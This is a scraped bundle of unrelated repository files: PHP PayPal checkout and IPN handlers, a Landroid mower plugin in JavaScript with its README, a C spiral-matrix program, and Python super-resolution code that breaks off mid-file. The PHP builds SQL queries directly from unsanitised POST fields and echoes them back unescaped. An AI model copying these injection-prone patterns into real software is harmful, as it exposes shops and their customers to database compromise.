saving it here not to loose, cause pp api docs are 90% useless
<file_sep>/checkout-pp.php
<div class="container">
<nav aria-label="breadcrumb">
<ol class="breadcrumb">
<li class="breadcrumb-item"><a href="/">Home</a></li>
<li class="breadcrumb-item active" aria-current="page">Payment</li>
</ol>
</nav>
</div>
<?php
if(!empty($_SESSION['cart'])){
$promo = addslashes(htmlspecialchars($_POST['promo']));
$promo = mb_strtoupper($promo, 'UTF-8');
if(!empty($promo)){
$query = "SELECT * FROM `promo` WHERE `code` = '$promo'";
$result = mysql_query($query);
$num = mysql_numrows($result);
if($num == 1){
$discount = mysql_result($result,0,'discount');
$free_delivery = mysql_result($result,0,'free_delivery');
}
}
$client_id = $_SESSION['client_id'];
$date = date('Y-m-d');
$time = date('H:i:s');
$query = "INSERT INTO `retail_orders` VALUES ('','','$date','$time','$client_id','','','','','','','','','','','','','','',1,'','','','','','','','','','$promo','$discount','$free_delivery','','','')";
mysql_query($query) or die ($query);
$order_id = mysql_insert_id();
//getting order number
$order_number = $order_id+1130;
$order_number = $index->numberFormat($order_number,5);
//saving order number
$query = "UPDATE `retail_orders` SET `order_number` = '$order_number' WHERE `id` = '$order_id'";
mysql_query($query) or die ($query);
$cart = $_SESSION['cart'];
$total = 0;
foreach($cart as $cart_id => $values){
foreach($values as $size => $cart_q)
{
$query = "SELECT * FROM `items` WHERE id = '$cart_id'";
$result = mysql_query($query);
$name = mysql_result($result, 0, 'name');
$price = mysql_result($result, 0, 'price');
$new_price = mysql_result($result, 0, 'new_price');
if ($new_price > 0) {
$sub_subtotal = $new_price * $cart_q;
$price = $new_price;
} else {
$sub_subtotal = $price * $cart_q;
}
$subtotal = $subtotal + $sub_subtotal;
//pushing each item into order
$query = "INSERT INTO `retail_order_items` VALUES ('','$order_id','$cart_id','$size','$price','$cart_q')";
$result = mysql_query($query);
}
}
if($free_delivery == 0){
$free_delivery_sum = $index->returnValue(23);
if ($subtotal >= $free_delivery_sum) {
$delivery = 0;
} else {
$delivery = $index->returnValue(24);
}
}
else {
$delivery = 0;
}
$total = $subtotal + $delivery;
if($discount > 0){
$total = $total - ($total * $discount)/100;
$total = number_format($total, 2);
}
$query = "UPDATE `retail_orders` SET `subtotal` = '$subtotal',`delivery` = '$delivery',`total` = '$total' WHERE `id` = '$order_id'";
mysql_query($query) or die($query);
// PAYPAL
$paypalEmail = "<EMAIL>";
$paypalURL = "https://www.paypal.com/cgi-bin/webscr";
$itemName = "Order #".$order_number;
$returnUrl = "https://siberiaspirit.com/payment-success?key=spirit";
$cancelUrl = "https://siberiaspirit.com/cart?key=spirit";
$notifyUrl = "https://siberiaspirit.com/ipn/cl.php";
?>
<div class="container">
<h1 class="public-inner-title product-title">Payment</h1>
<p class="thankyou">Thank you for your order! Now you will be redirected to the payment page. If you don't want to wait press the button.</p>
<form action="<?php echo $paypalURL; ?>" method="post" target="_top" class="df-form" id="topaypal">
<!-- Identify your business so that you can collect the payments. -->
<input type="hidden" name="business" value="<?=$paypalEmail?>">
<!-- Specify a Buy Now button. -->
<input type="hidden" name="cmd" value="_xclick">
<!-- Specify details about the item that buyers will purchase. -->
<input type="hidden" name="item_name" value="<?=$itemName?>">
<input type="hidden" name="amount" value="<?=$total?>">
<input type="hidden" name="currency_code" value="USD">
<input type="hidden" name="notify_url" value="<?=$notifyUrl?>">
<input type="hidden" name="custom" value="<?=$order_id?>">
<input type="hidden" name="no_shipping" value="2">
<!-- Display the payment button. -->
<!-- <input type="image" name="submit" border="0"
src="https://www.paypalobjects.com/en_US/i/btn/btn_buynow_LG.gif"
alt="Buy Now"> -->
<div class="row">
<div class="col-sm-5">
<button type="submit" class="df-btn accent-btn submit">Continue to payment</button>
</div>
</div>
<img alt="" border="0" width="1" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif">
</form>
</div>
<?php
//clearing cart
unset ($_SESSION['cart']);
unset ($_SESSION['s_quantity']);
unset ($_SESSION['s_pairs']);
}
else {
?>
<div class="container">
<h1 class="public-inner-title product-title">Order payment</h1>
<div class="cart-block">
<p class="empty">Your cart is empty :(</p>
</div>
</div>
<?php
}
?>
<file_sep>/cl.php
<?php
// STEP 1: read POST data
// Reading POSTed data directly from $_POST causes serialization issues with array data in the POST.
// Instead, read raw POST data from the input stream.
$raw_post_data = file_get_contents('php://input');
$raw_post_array = explode('&', $raw_post_data);
$myPost = array();
foreach ($raw_post_array as $keyval) {
$keyval = explode ('=', $keyval);
if (count($keyval) == 2)
$myPost[$keyval[0]] = urldecode($keyval[1]);
}
// read the IPN message sent from PayPal and prepend 'cmd=_notify-validate'
$req = 'cmd=_notify-validate';
if(function_exists('get_magic_quotes_gpc')) {
$get_magic_quotes_exists = true;
}
foreach ($myPost as $key => $value) {
if($get_magic_quotes_exists == true && get_magic_quotes_gpc() == 1) {
$value = urlencode(stripslashes($value));
} else {
$value = urlencode($value);
}
$req .= "&$key=$value";
}
// STEP 2: POST IPN data back to PayPal to validate
$ch = curl_init('https://www.paypal.com/cgi-bin/webscr');
curl_setopt($ch, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $req);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
curl_setopt($ch, CURLOPT_FORBID_REUSE, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Connection: Close'));
// In wamp-like environments that do not come bundled with root authority certificates,
// please download 'cacert.pem' from "http://curl.haxx.se/docs/caextract.html" and set
// the directory path of the certificate as shown below:
// curl_setopt($ch, CURLOPT_CAINFO, dirname(__FILE__) . '/cacert.pem');
if( !($res = curl_exec($ch)) ) {
// error_log("Got " . curl_error($ch) . " when processing IPN data");
curl_close($ch);
exit;
}
curl_close($ch);
// STEP 3: Inspect IPN validation result and act accordingly
if (strcmp ($res, "VERIFIED") == 0) {
// The IPN is verified, process it:
// check whether the payment_status is Completed
// check that txn_id has not been previously processed
// check that receiver_email is your Primary PayPal email
// check that payment_amount/payment_currency are correct
// process the notification
// assign posted variables to local variables
$txn_id = $_POST['txn_id'];
$order_number = $_POST['item_name'];
$payment_amount = $_POST['mc_gross'];
$payment_currency = $_POST['mc_currency'];
$payment_status = $_POST['payment_status'];
$receiver_email = $_POST['receiver_email'];
$payer_email = $_POST['payer_email'];
$order_id = $_POST['custom'];
$full_name = $_POST['address_name'];
$names = explode (" ",$full_name);
$first_name = $names[0];
$last_name = $names[1];
$address = $_POST['address_street'];
$city = $_POST['address_city'];
$state = $_POST['address_state'];
$query = "SELECT `id` FROM `states` WHERE `abbr` = '$state'";
$result = mysql_query($query);
$state = mysql_result($result, 0, 'id');
$zip = $_POST['address_zip'];
$date = date('Y-m-d H:i:s');
include $_SERVER["DOCUMENT_ROOT"].'/classes/db.php';
$database = new database();
$database->connect();
$query = "SELECT * FROM `transactions` WHERE `txn_id` = '$txn_id'";
$result = mysql_query($query);
if (mysql_num_rows($result) == 0){
$query = "INSERT INTO `transactions` VALUES ('','$txn_id','$payment_amount','$payment_currency','$date','$payment_status','$receiver_email','$payer_email','$order_id',1)";
mysql_query($query);
$query = "UPDATE `retail_orders` SET `first_name` = '$first_name',`last_name` = '$last_name',`address_1` = '$address',`city` = '$city',`state` = '$state',`zip` = '$zip' WHERE `id` = '$order_id'";
$result = mysql_query($query);
$query = "SELECT * FROM `retail_orders` WHERE `id` = '$order_id'";
$result = mysql_query($query);
$order_total = mysql_result($result,0,'total');
if ($payment_amount == $order_total){
$query = "UPDATE `retail_orders` SET `payment` = 1 WHERE `id` = '$order_id'";
$result = mysql_query($query);
// IPN message values depend upon the type of notification sent.
// To loop through the &_POST array and print the NV pairs to the screen:
foreach($_POST as $key => $value) {
echo $key." = ". $value."<br>";
}
}
}
} else if (strcmp ($res, "INVALID") == 0) {
// IPN invalid, log for manual investigation
echo "The response from IPN was: <b>" .$res ."</b>";
}
?><file_sep>/ipn_old.php
<?php
include $_SERVER["DOCUMENT_ROOT"].'/classes/db.php';
$database = new database();
$database->connect();
$paypalEmail = "<EMAIL>";
$paypalURL = "https://ipnpb.sandbox.paypal.com/cgi-bin/webscr";
$raw_post_data = file_get_contents('php://input');
$raw_post_array = explode('&', $raw_post_data);
$myPost = array();
foreach ($raw_post_array as $keyval) {
$keyval = explode('=', $keyval);
if (count($keyval) == 2) {
$myPost[$keyval[0]] = urldecode($keyval[1]);
}
}
//здесь мы можем уже сохранить данные в бд и потом проверить правильность 'txn_id'
$req = 'cmd=_notify-validate';
if (function_exists('get_magic_quotes_gpc')) {
$get_magic_quotes_exists = true;
}
foreach ($myPost as $key => $value) {
if ($get_magic_quotes_exists == true && get_magic_quotes_gpc() == 1) {
$value = urlencode(stripslashes($value));
}else {
$value = urlencode($value);
}
$req .= "&$key=$value";
}
$ch = curl_init($paypalURL);
if ($ch == FALSE) {
return FALSE;
}
curl_setopt($ch, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $req);
curl_setopt($ch, CURLOPT_SSLVERSION, 6);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
curl_setopt($ch, CURLOPT_FORBID_REUSE, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'User-Agent: PHP-IPN-Verification-Script',
'Connection: Close',
));
$res = curl_exec($ch);
if ( ! ($res)) {
$errno = curl_errno($ch);
$errstr = curl_error($ch);
curl_close($ch);
throw new Exception("cURL error: [$errno] $errstr");
}
$info = curl_getinfo($ch);
$http_code = $info['http_code'];
if ($http_code != 200) {
throw new Exception("PayPal responded with http code $http_code");
}
curl_close($ch);
$tokens = explode("\r\n\r\n", trim($res));
$res = trim(end($tokens));
if (strcmp($res, "VERIFIED") == 0 || strcasecmp($res, "VERIFIED") == 0){
// Payment data
$item_number = $_POST['item_number'];
$txn_id = $_POST['txn_id'];
$payment_gross = $_POST['mc_gross'];
$currency_code = $_POST['mc_currency'];
$payment_status = $_POST['payment_status'];
// если мы сохранили данные в бд то тут нужно проверить валидность TXN ID.
// Check if payment data exists with the same TXN ID.
// $valid_txnid = check_txnid($txn_id);
$txn_id = $_POST['txn_id'];
$order_number = $_POST['item_name'];
$payment_amount = $_POST['mc_gross'];
$payment_currency = $_POST['mc_currency'];
$payment_status = $_POST['payment_status'];
$receiver_email = $_POST['receiver_email'];
$payer_email = $_POST['payer_email'];
$order_id = $_POST['custom'];
$date = date('Y-m-d H:i:s');
//$full_ipn = json_encode($myPost);
$query = "SELECT * FROM `transactions` WHERE `txn_id` = '$txn_id'";
$result = mysql_query($query);
if (mysql_num_rows($result) == 0){
$query = "INSERT INTO `transactions` VALUES ('$txn_id','$payment_amount','$payment_currency','$date','$payment_status','$receiver_email','$payer_email','$order_id')";
mysql_query($query) or die ($query);
}
$query = "SELECT * FROM `retail_orders` WHERE `id` = '$order_id'";
$result = mysql_query($query);
$order_total = mysql_result($result,0,'total');
if ($payment_amount == $order_total){
$query = "UPDATE `retail_orders` SET `payment` = 1 WHERE `id` = '$order_id'";
$result = mysql_query($query) or die ($query);
if ($result){
// дальше изменяем группу пользователя в upgraded в бд
// но конечно нужно проверить сначала если есть такои пользователь и может изменить больше данных
// тут должны присылать письмо пользователю что все в порядке и админу тоже
}else{
// сообщаем админу
// Error inserting into DB
// E-mail admin or alert user
}
}else{
// сообщаем админу
}
}else{
// сообщаем админу
}
$txn_id = $_POST['txn_id'];
$order_number = $_POST['item_name'];
$payment_amount = $_POST['mc_gross'];
$payment_currency = $_POST['mc_currency'];
$payment_status = $_POST['payment_status'];
$receiver_email = $_POST['receiver_email'];
$payer_email = $_POST['payer_email'];
$order_id = $_POST['custom'];
$date = date('Y-m-d H:i:s');
//$full_ipn = json_encode($myPost);
$query = "SELECT * FROM `transactions` WHERE `txn_id` = '$txn_id'";
$result = mysql_query($query);
if (mysql_num_rows($result) == 0){
$query = "INSERT INTO `transactions` VALUES ('$txn_id','$payment_amount','$payment_currency','$date','$payment_status','$receiver_email','$payer_email','$order_id')";
mysql_query($query) or die ($query);
}
?> | db95e849469929e621cb6dcd0800b1a47fe86bb4 | [
"Markdown",
"PHP"
] | 4 | Markdown | icerock/paypal_form_and_ipn | bacb79beefb992cb730a7ec8d77282a05875e137 | f77e75199ea2aaccd793d267cbd5f87a8dfa87b0 |
refs/heads/master | <file_sep># Release History
* 20200325, v0.1.1
* initial release
* 20200326, v0.1.2
* added rule action string check
* 20200326, v0.1.3
* update package.json
* 20200326, v0.1.4
* fix schedule string
* 20200326, v0.1.8
* added next scheduled mowing
* 20200326, v0.1.11
* added display type attributes
* 20200326, v0.1.12
* update on/off line status
* 20200326, v0.1.13
* added nextMowe acronym
* 20200326, v0.1.14
* fix scheduler
* 20200326, v0.1.15
* edit nextMowe
* 20200328, v0.1.16
* check on double schedule day
* 20200328, v0.1.17
* update uuid lib
* 20200328, v0.1.18
* update logging info
* 20200404, v0.1.19
* reconnect timer to 1 hour
* 20200405, v0.1.20
* schedule fix for today
* 20200410, v0.1.21
* improve onlinecheck error handling
* 20200415, v0.1.22
* improve cloud status handling
* 20210507, v0.1.23
* change api calls to https<file_sep># pimatic-landroid
Pimatic plugin for Worx Landroid mower
This plugin lets you control and get status info from a Landroid mower. Supported mowers are mowers that can be controlled via the Landroid app and are wifi connected to the Worx cloud.
This plugin is tested with a Landroid M500 and should work will all cloud connected Landroid mowers.
After downloading the Landoid app, you can register in the app with your email and password.
After registration you can add your mower in the app, configure the wifi and other settings.
When these steps are done you can configure the pimatic-landoid plugin.
## Config of the plugin
```
{
email: "The email address for your Landroid account"
password: "<PASSWORD>"
debug: "Debug mode. Writes debug messages to the Pimatic log, if set to true."
}
```
## Config of a LandroidMower device
Mowers are added via the discovery function. Per mower a LandroidMower is discovered unless the device is already in the config.
The automatic generated Id must not change. Its the unique reference to your mower. You can change the Pimatic device name after you have saved the device. This is the only device variable you may change!
The following data is automatically generated on device discovery and should not be changed!
```
{
serial: "Serialnumber of the mower"
mac: "Mac address of the mower"
landroid_id: "Landroid ID number of the mower"
command_in: "Mqtt command-in string"
command_out: "Mqtt command-out string"
}
```
The following variables (attributes) are available in the gui / pimatic.
```
cloud: "If plugin is connected or disconnected to the Worx-landroid cloud"
status: "Actual status of the mower (idle, mowing, etc)"
mower: "Mower offline or online"
rainDelay: "Delay after rain, before mowing (minutes)"
totalTime: "TotalTime the mower has mowed (minutes)"
totalDistance: "TotalDistance the mower has mowed (meters)"
totalBladeTime: "TotalBladeTime the mower has mowed (minutes)"
battery: "Battery level (0-100%)"
batteryCharging: "If true battery is charging"
batteryTemperature: "Battery temperature of mower"
wifi: "Wifi strenght at the mower (dBm)"
```
The mower can be controller and configured via rules.
The action syntax is:
```
mower <mower-id>
[start|pause|stop]
[raindelay] <raindelay-number>
[schedule] $schedule-variable | "schedule string"
```
The schedule can be set for a week starting at sunday till saturday. This schedule is repeated every week.
The $schedule-variable contains a string with one or more days, separated by a semi-colon (;)
The format for one day is:
```
<day-of-week>, <time-string>, <duration>, <edgeCut>
valid values:
<day-of-week>: [sunday|monday|tuesday|wednesday|thursday|friday|saturday]
<time-string>: 00:00 - 23:59
<duration>: 0 - 1439 (minutes)
<edgeCut>: 0 or 1
```
for example if you want to set the mower for tuesday and friday at 10:00 for 1 hour with edgeCutting,
the command is:
```
mower <mower-id> schedule $schedule-variable
$schedule-variable = tuesday, 10:00, 60, 1; friday, 10:00, 60, 1
```
or directly with a string in the action part of a rule
```
mower <mower-id> schedule "tuesday, 10:00, 60, 1; friday, 10:00, 60, 1"
```
---
The plugin is partly based on ioBroker.worx and homebridge-landroid
You could backup Pimatic before you are using this plugin!
__The minimum requirement for this plugin is node v8!__
<file_sep>"use strict";
const moment = require("moment");
function LandroidDataset(readings){
if(readings != null && readings != undefined)
this.parse(readings);
}
LandroidDataset.prototype.parse = function(readings) {
if (readings["cfg"]) {
this.language = readings["cfg"]["lg"];
this.dateTime = moment(readings["cfg"]["dt"] + " " + readings["cfg"]["tm"], "DD/MM/YYYY HH:mm:ss");
this.rainDelay = parseInt(readings["cfg"]["rd"], 10);
this.serialNumber = readings["cfg"]["sn"];
if (readings["cfg"]["sc"]) {
this.active = (readings["cfg"]["sc"]["m"] ? true : false);
this.timeExtension = Number(readings["cfg"]["sc"]["p"]).valueOf();
if (readings["cfg"]["sc"]["d"]) {
this.schedule = readings["cfg"]["sc"]["d"];
let entries = readings["cfg"]["sc"]["d"];
entries.forEach(entry => {
/*let timePeriod = new TimePeriod();
let start = String(entry[0]).split(":");
timePeriod.startHour = parseInt(start[0], 10);
timePeriod.startMinute = parseInt(start[1], 10);
timePeriod.durationMinutes = parseInt(entry[1], 10);
timePeriod.cutEdge = (entry[2] ? true : false);
this.schedule.push(timePeriod);*/
});
}
}
}
if (readings["dat"]) {
if (readings["dat"]["st"]) {
this.totalTime = Number(readings["dat"]["st"]["wt"]).valueOf();
this.totalDistance = Number(readings["dat"]["st"]["d"]).valueOf();
this.totalBladeTime = Number(readings["dat"]["st"]["b"]).valueOf();
}
if (readings["dat"]["bt"]) {
this.batteryChargeCycle = Number(readings["dat"]["bt"]["nr"]).valueOf();
this.batteryCharging = (readings["dat"]["bt"]["c"] ? true : false);
this.batteryVoltage = Number(readings["dat"]["bt"]["v"]).valueOf();
this.batteryTemperature = Number(readings["dat"]["bt"]["t"]).valueOf();
this.batteryLevel = Number(readings["dat"]["bt"]["p"]).valueOf();
}
this.macAddress = readings["dat"]["mac"];
this.firmware = readings["dat"]["fw"];
this.wifiQuality = Number(readings["dat"]["rsi"]).valueOf();
this.statusCode = Number(readings["dat"]["ls"]).valueOf();
this.statusDescription = LandroidDataset.STATUS_CODES[this.statusCode];
this.errorCode = Number(readings["dat"]["le"]).valueOf();
this.errorDescription = LandroidDataset.ERROR_CODES[this.errorCode];
}
}
LandroidDataset.STATUS_CODES = {
0: 'IDLE',
1: 'Home',
2: 'Start sequence',
3: 'Leaving home',
4: 'Follow wire',
5: 'Searching home',
6: 'Searching wire',
7: 'Mowing',
8: 'Lifted',
9: 'Trapped',
10: 'Blade blocked',
11: 'Debug',
12: 'Remote control',
30: 'Going home',
31: 'Zone training',
32: 'Border Cut',
33: 'Searching zone',
34: 'Pause'
};
LandroidDataset.ERROR_CODES = {
0: 'No error',
1: 'Trapped',
2: 'Lifted',
3: 'Wire missing',
4: 'Outside wire',
5: 'Raining',
6: 'Close door to mow',
7: 'Close door to go home',
8: 'Blade motor blocked',
9: 'Wheel motor blocked',
10: 'Trapped timeout',
11: 'Upside down',
12: 'Battery low',
13: 'Reverse wire',
14: 'Charge error',
15: 'Timeout finding home',
16: 'Mower locked',
17: 'Battery over temperature',
};
module.exports = LandroidDataset;
| 47a185adb59161241967e3325f16f7c0afccecc9 | [
"Markdown",
"JavaScript"
] | 3 | Markdown | bertreb/pimatic-landroid | 9e9ba13e0371a0f08cf90d54bef59a32ad744655 | c4b01e7b55319a4e1f3ce1215044dc6c4420fbdf |
refs/heads/master | <file_sep>#include<stdio.h>
void printList(int n,int arr[][n]){
printf("\n");
for(int i=0;i<n;++i){
for(int j=0;j<n;++j)
{
printf("%d\t",arr[i][j]);
}
printf("\n");
}
printf("\n");
}
int main(){
int n;
printf("Spiral matris boyutunu giriniz:");
scanf("%d",&n);
int arr[n][n];
for(int i=0;i<n;++i){ //<3
for(int j=0;j<n;++j)
{
arr[j][i]=0;
}
}
int sayac=1;
int i;
int satır=0;
int sutun=0;
int asagiSol=1;
for(int k=n;k>0;--k){
if(k==n){
for(i=sutun;i<sutun+k;++i){
arr[satır][i]=sayac;
++sayac;
printList(n,arr);
}
sutun=i-1;
}
else{
if(asagiSol==1)//asagı ve sola
{ //printf("e:%d ,satır:%d,sutun:%d,k:%d\n",e%2,satır,sutun,k);
for(i=satır+1;i<=satır+k;++i){//asagı
arr[i][sutun]=sayac;
++sayac;
printList(n,arr);
}
satır=i-1;
//printf("e:%d ,satır:%d,sutun:%d\n",e%2,satır,sutun);
for(i=sutun-1;i>=sutun-k;--i){//sola
arr[satır][i]=sayac;
++sayac;
printList(n,arr);
}
sutun=i+1;
asagiSol=0;
}
else{//yukarı ve saga
for(i=satır-1;i>=satır-k;--i){//yukarı
arr[i][sutun]=sayac;
++sayac;
printList(n,arr);
}
satır=i+1;
for(i=sutun+1;i<=sutun+k;++i){//sağa
arr[satır][i]=sayac;
++sayac;
printList(n,arr);
}
sutun=i-1;
asagiSol=1;
}
}
}
printf("son hali:\n");
printList(n,arr);
return 0;
} | 59c27b1b34bcf0f52d896acf09052ac140c6a8e0 | [
"C"
] | 1 | C | EmirhanAkturk/Spiral-Matris | 13dfe96ee9d25c162047581caf6c39e268b95fa3 | 3af8bba589d4b3cea278901bc16b299a9f90e785 |
refs/heads/master | <repo_name>sjsong08/SuperResolution<file_sep>/utils.py
import cv2
import numpy as np
import tensorflow as tf
import os
import scipy.ndimage
import scipy.misc
def imread(path, gray=False, mode='YCbCr'):
if gray==True:
return scipy.misc.imread(path, flatten=True, mode=mode).astype(np.float)/255.
else:
return scipy.misc.imread(path, mode=mode).astype(np.float)/255.
def imsave(image, path):
return scipy.misc.imsave(path, image)
cv2.imwrite(os.path.join(os.getcwd(), path), image*255.)
def get_patches(image, image_size=32, stride=14, is_save=False, path='images/patches/'):
if len(image.shape)==3:
h, w, c = image.shape
else:
h, w = image.shape
sub_images=[]
cnt=0
for x in range(0, h-image_size, stride):
for y in range(0, w-image_size, stride):
sub_image = image[x:x+image_size, y:y+image_size]
sub_images.append(sub_image)
cnt+=1
if is_save:
if not os.path.isdir(os.path.join(os.getcwd(), path)):
os.makedirs(os.path.join(os.getcwd(), path))
cv2.imwrite(os.path.join(os.getcwd(), path)+str(cnt)+'.png', sub_image)
return np.array(sub_images)
def imgset_read(path, index, gray=True, is_train=False):
img_set = []
if gray:
for i in (index):
img = scipy.misc.imread(path+str(i)+'.png', flatten=True, mode='YCbCr').astype(np.float)/255.
img_set.append(img)
return np.array(img_set)
else:
for i in (index):
img = scipy.misc.imread(path+str(i)+'.png', mode='rgb').astype(np.float)/255.
img_set.append(img)
return np.array(img_set)
def imgresize(image, scale=2.):
num_sample = image.shape[0]
if len(image.shape)==4:
images = np.zeros([image.shape[0], int(image.shape[1]*scale), int(image.shape[2]*scale), image.shape[3]])
for i in range(num_sample):
images[i,:,:,0] = cv2.resize(image[i,:,:], None, fx=scale, fy=scale, interpolation=cv2.INTER_CUBIC)
return images
else:
images = np.zeros([image.shape[0], int(image.shape[1]*scale), int(image.shape[2]*scale)])
for i in range(num_sample):
images[i,:,:] = cv2.resize(image[i,:,:], None, fx=scale, fy=scale, interpolation=cv2.INTER_CUBIC)
return images
def preproc(image, scale=2, gray=True):
if gray:
return scipy.ndimage.interpolation.zoom(image, (scale/1.), prefilter=False)
else:
image1 = scipy.ndimage.interpolation.zoom(image[:,:,0], (scale/1.), prefilter=False)
image2 = scipy.ndimage.interpolation.zoom(image[:,:,1], (scale/1.), prefilter=False)
image3 = scipy.ndimage.interpolation.zoom(image[:,:,2], (scale/1.), prefilter=False)
imageA = np.stack([image1, image2, image3], axis=2)
return imageA
def bicubic_upsize(image, scale=2):
if len(image.shape)==4:
bicImg=np.zeros([image.shape[0], image.shape[1]*scale, image.shape[2]*scale, image.shape[3]])
for i in range(image.shape[0]):
bicImg[i,:,:,:] = scipy.ndimage.interpolation.zoom(image[i,:,:,:], [scale, scale, 1], prefilter=False)
else:
bicImg = scipy.ndimage.interpolation.zoom(image, [scale,scale, 1], prefilter=False)
return bicImg
def _phase_shift(I, r):
# Helper function with main phase shift operation
bsize, a, b, c = I.get_shape().as_list()
X = tf.reshape(I, (-1, a, b, r, r))
X = tf.transpose(X, (0, 1, 2, 4, 3)) # bsize, a, b, 1, 1
X = tf.split(X, a, 1, name='split1') # a, [bsize, b, r, r]
X = tf.concat([tf.squeeze(x) for x in X], axis=2) # bsize, b, a*r, r
X = tf.split(X, b, 1, name='split2') # b, [bsize, a*r, r]
X = tf.concat([tf.squeeze(x) for x in X], axis=2) # bsize, a*r, b*r
return tf.reshape(X, (-1, a*r, b*r, 1))
def PS(X, r, color=False):
# Main OP that you can arbitrarily use in you tensorflow code
if color:
Xc = tf.split(X,3,3) #(3, 3, X)
X = tf.concat([_phase_shift(x, r) for x in Xc], axis=3)
else:
X = _phase_shift(X, r)
return X
def squash(s, axis=-1, epsilon=1e-7, name=None):
with tf.name_scope(name, default_name="squash"):
squared_norm = tf.reduce_sum(tf.square(s), axis=axis, keep_dims=True)
safe_norm = tf.sqrt(squared_norm + epsilon)
squash_factor = squared_norm / (1. + squared_norm)
unit_vector = s / safe_norm
return squash_factor * unit_vector
def safe_norm(s, axis=-1, epsilon=1e-7, keep_dims=False, name=None):
with tf.name_scope(name, default_name="safe_norm"):
squared_norm = tf.reduce_sum(tf.square(s), axis=axis,
keep_dims=keep_dims)
return tf.sqrt(squared_norm + epsilon)<file_sep>/VDSR-v1.py
import numpy as np
import tensorflow as tf
import os
#import imageio
import scipy.ndimage
import scipy.misc
#import matplotlib.pyplot as plt
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"]="1"
image_x = 1920/10
image_y = 1080/10
def imread(path, index, scale=1, gray=True, is_train=False):
if gray:
image = np.zeros([len(index), image_y, image_x, 1])
cnt = 0
for i in (index):
if is_train:
img = scipy.misc.imread(path + str(i).zfill(4) + 'x' + str(scale) + '.png', flatten=True,
mode='YCbCr').astype(np.float) / 255.
else:
img = scipy.misc.imread(path + str(i).zfill(4) + '.png', flatten=True, mode='YCbCr').astype(
np.float) / 255.
if img.shape[1] < img.shape[0]:
img = img.T
if is_train and img.shape[0] >= 540:
image[cnt, :, :, 0] = preproc(img[:int(image_y / scale), :int(image_x / scale)], scale)
cnt += 1
elif is_train == False and img.shape[0] >= 1080:
image[cnt, :, :, 0] = img[:int(image_y / scale), :int(image_x / scale)]
cnt += 1
return image[:cnt, :, :, :]
else:
image = np.zeros([len(index), image_y, image_x, 3])
cnt = 0
for i in (index):
if is_train:
img = scipy.misc.imread(path + str(i).zfill(4) + 'x' + str(scale) + '.png', mode='YCbCr').astype(
np.float) / 255.
else:
img = scipy.misc.imread(path + str(i).zfill(4) + '.png', mode='YCbCr').astype(np.float) / 255.
if img.shape[1] < img.shape[0]:
img1 = img[:, :, 0].T
img2 = img[:, :, 1].T
img3 = img[:, :, 2].T
img = np.stack([img1, img2, img3], axis=2)
if is_train:
image[cnt, :, :, :] = preproc(img[:int(image_y / scale), :int(image_x / scale), :], scale)
else:
image[cnt, :, :, :] = img[:int(image_y / scale), :int(image_x / scale), :]
cnt += 1
return image
def preproc(image, scale=2, gray=True):
if gray:
return scipy.ndimage.interpolation.zoom(image, (scale / 1.), prefilter=False)
else:
image1 = scipy.ndimage.interpolation.zoom(image[:, :, 0], (scale / 1.), prefilter=False)
image2 = scipy.ndimage.interpolation.zoom(image[:, :, 1], (scale / 1.), prefilter=False)
image3 = scipy.ndimage.interpolation.zoom(image[:, :, 2], (scale / 1.), prefilter=False)
imageA = np.stack([image1, image2, image3], axis=2)
return imageA
def imsave(image, path):
return scipy.misc.imsave(path, image)
tf.reset_default_graph()
device = "/device:GPU:0"
gray = True
epoch_size = 1000
batch_size = 5
total_iter = 800 / batch_size
if gray == True:
c_dim = 1
else:
c_dim = 3
learning_rate = 1e-3
with tf.device(device):
X = tf.placeholder(tf.float32, [None, image_y, image_x, c_dim], name='input')
Y = tf.placeholder(tf.float32, [None, image_y, image_x, c_dim], name='output')
weights = {
'w1': tf.get_variable('w1', shape=[3, 3, 1, 64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
'w2': tf.get_variable('w2', shape=[3, 3, 64, 64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
'w3': tf.get_variable('w3', shape=[3, 3, 64, 64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
'w4': tf.get_variable('w4', shape=[3, 3, 64, 64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
'w5': tf.get_variable('w5', shape=[3, 3, 64, 64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
'w6': tf.get_variable('w6', shape=[3, 3, 64, 64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
'w7': tf.get_variable('w7', shape=[3, 3, 64, 64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
'w8': tf.get_variable('w8', shape=[3, 3, 64, 64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
'w9': tf.get_variable('w9', shape=[3, 3, 64, 64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
'w10': tf.get_variable('w10', shape=[3, 3, 64, 64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
'w11': tf.get_variable('w11', shape=[3, 3, 64, 64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
'w12': tf.get_variable('w12', shape=[3, 3, 64, 64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
'w13': tf.get_variable('w13', shape=[3, 3, 64, 64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
'w14': tf.get_variable('w14', shape=[3, 3, 64, 64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
'w15': tf.get_variable('w15', shape=[3, 3, 64, 64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
